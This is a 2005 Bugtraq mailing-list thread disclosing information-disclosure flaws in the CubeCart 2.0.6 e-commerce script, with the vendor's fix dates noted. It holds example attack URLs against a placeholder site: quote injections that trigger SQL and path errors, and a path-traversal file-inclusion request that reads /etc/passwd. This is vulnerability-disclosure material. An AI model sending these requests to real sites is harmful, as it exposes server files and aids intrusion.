RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

["John Cobb" <johnc () nobytes com>]

Hi Ravish,

This only happens on older versions, it was fixed in 2.0.5. (see
[NOBYTES.COM: #2] CubeCart 2.0.4 - Multiple Vulnerabilities)
The only other thing an attacker could do is to include a .php file
somewhere else on the server.
For example, if the attacker also had his/her website on that same server
and knew the full path to it, they could use file inclusion to launch an
'evil' .php file from there home folder.

Regards

John


www.NoBytes.com
 
Web Design, Web Hosting, Hardware, Software, You Name it, if its to do with
IT we can sort it.
 

-----Original Message-----
From: Ravish Ahuja [mailto:ravish () xeonext com] 
Sent: 06 April 2005 20:44
To: 'John Cobb'; bugtraq () securityfocus com
Subject: RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

Hello,

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

This is path disclosure but it can also be used for malicious file include.

http://www.victimsite.com/index.php?language=../../../../../etc/passwd

Regards,
Ravish
http://www.xeonext.com


-----Original Message-----
From: John Cobb [mailto:johnc () nobytes com]
Sent: Sunday, February 06, 2005 11:09 PM
To: bugtraq () securityfocus com
Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

Hello All,

I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.

Authors Site: http://www.cubecart.com

CubeCart is described by its authors as:

'What is CubeCart?

CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

[2]------------------------------------------------------------+

http://www.victimsite.com/index.php?&PHPSESSID='

Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0

[3]------------------------------------------------------------+

http://www.victimsite.com/tellafriend.php?&product='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46

[4]------------------------------------------------------------+

http://www.victimsite.com/view_cart.php?add='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49

[5]------------------------------------------------------------+

http://www.victimsite.com/view_product.php?product='

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005

 

Regards

John Cobb

JohnC () NoBytes com

http://www.NoBytes.com